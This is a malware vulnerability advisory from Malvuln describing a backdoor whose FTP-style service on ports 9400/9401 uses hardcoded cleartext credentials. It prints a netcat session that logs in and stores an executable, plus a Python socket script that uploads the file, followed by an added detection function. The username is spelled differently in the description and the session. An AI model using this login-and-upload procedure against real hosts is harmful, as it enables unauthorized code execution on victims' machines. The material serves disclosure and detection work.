Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/dd76d8a5874bf8bf05279e35c68449ca.txt
Contact: [email protected]
Backup media: infosec.exchange/@malvuln
Vulnerability: Hardcoded Cleartext Credentials
Vuln ID: MVID-2022-0665
Dropped files: incsrv.exe
Description: This malware listens on TCP ports 9400 and 9401 and requires authentication. The username "IncUserb3" is stored in cleartext in the file "incsrv.drv" under the Windows directory. The password "InClientMainPassword" is also stored in cleartext, inside the PE file "incsrv.exe" at offset 000958d0. Because both values are recoverable from disk, third-party adversaries can authenticate to the backdoor and upload their own executables using the FTP PASV and STOR commands.
C:\>nc64.exe 192.168.18.125 9401
220 InCommand FTP Server ready.
USER IncUser-b3
331 Password required for IncUser-b3.
PASS InClientMainPassword
230 User IncUser-b3 logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
PASV
227 Entering Passive Mode (192,168,18,125,241,155).
CWD C:/
250 CWD command successful. "C:/" is current directory.
STOR DOOM_SM.exe
150 Opening data connection for DOOM_SM.exe
226 File received OK
from socket import *
f = open("DOOM_SM.exe", "rb")                  # executable to push over the data channel
EXE = f.read()
s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.18.125", 241 * 256 + 155))  # data port from the 227 PASV reply (241,155)
while EXE:                                     # send until the whole file has gone out
    EXE = EXE[s.send(EXE):]
s.close()
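An added detection example, written for this advisory and not part of the original page or the malware: it walks a captured FTP control-channel session like the one above, flags use of the hardcoded account named in the advisory, derives the PASV data endpoint from the 227 reply, and raises an alert when an executable is STORed over one of the backdoor ports. The sample session is constructed from the exchange quoted above (password masked).

```python
import re

# Hardcoded account and listening ports named in the advisory (values from the page).
KNOWN_BACKDOOR_USER = "incuser-b3"
KNOWN_BACKDOOR_PORTS = {9400, 9401}
PASV_RE = re.compile(r"227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")

def parse_pasv(reply):
    """Turn a 227 reply into (ip, port); the data port is p1 * 256 + p2."""
    m = PASV_RE.search(reply)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2

def analyze_ftp_session(lines, dst_port):
    """Walk an ordered control-channel capture and report signs of backdoor use."""
    result = {"user": None, "known_backdoor_user": False,
              "pasv_endpoint": None, "stored_files": [], "alert": False}
    for line in lines:
        line = line.strip()
        if line.upper().startswith("USER "):
            result["user"] = line[5:].strip()
            result["known_backdoor_user"] = result["user"].lower() == KNOWN_BACKDOOR_USER
        elif line.startswith("227 "):
            result["pasv_endpoint"] = parse_pasv(line)   # where the upload data will flow
        elif line.upper().startswith("STOR "):
            result["stored_files"].append(line[5:].strip())
    # Alert only on the full pattern: backdoor port, hardcoded account, executable written.
    result["alert"] = (dst_port in KNOWN_BACKDOOR_PORTS
                       and result["known_backdoor_user"]
                       and any(f.lower().endswith(".exe") for f in result["stored_files"]))
    return result

# Constructed sample session, modelled on the exchange quoted in the advisory.
SAMPLE_SESSION = [
    "220 InCommand FTP Server ready.",
    "USER IncUser-b3",
    "331 Password required for IncUser-b3.",
    "PASS ********",
    "230 User IncUser-b3 logged in.",
    "PASV",
    "227 Entering Passive Mode (192,168,18,125,241,155).",
    "STOR DOOM_SM.exe",
    "150 Opening data connection for DOOM_SM.exe",
    "226 File received OK",
]
```

Fed the same session observed on a port other than 9400/9401, or with a different account, the function returns the parsed fields but leaves alert false, so the rule only fires on the combination the advisory describes.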
Disclaimer: This advisory information is provided “as-is,” without warranties, guarantees or other conditions. This advisory may be redistributed, subject to its original form and credit. For inclusion in vulnerability databases or similar programs, permission is granted explicitly provided credit to the author. Author is not responsible or liable for misuse or misappropriation of information. Any malicious or illegal use of security-related information, exploits or other methods is prohibited by the author. You should not try to obtain Malware samples. This website does not accept responsibility for damages resulting from Malware handling errors or downloading any Malware. Copyright for all content (c) Malvuln.comTM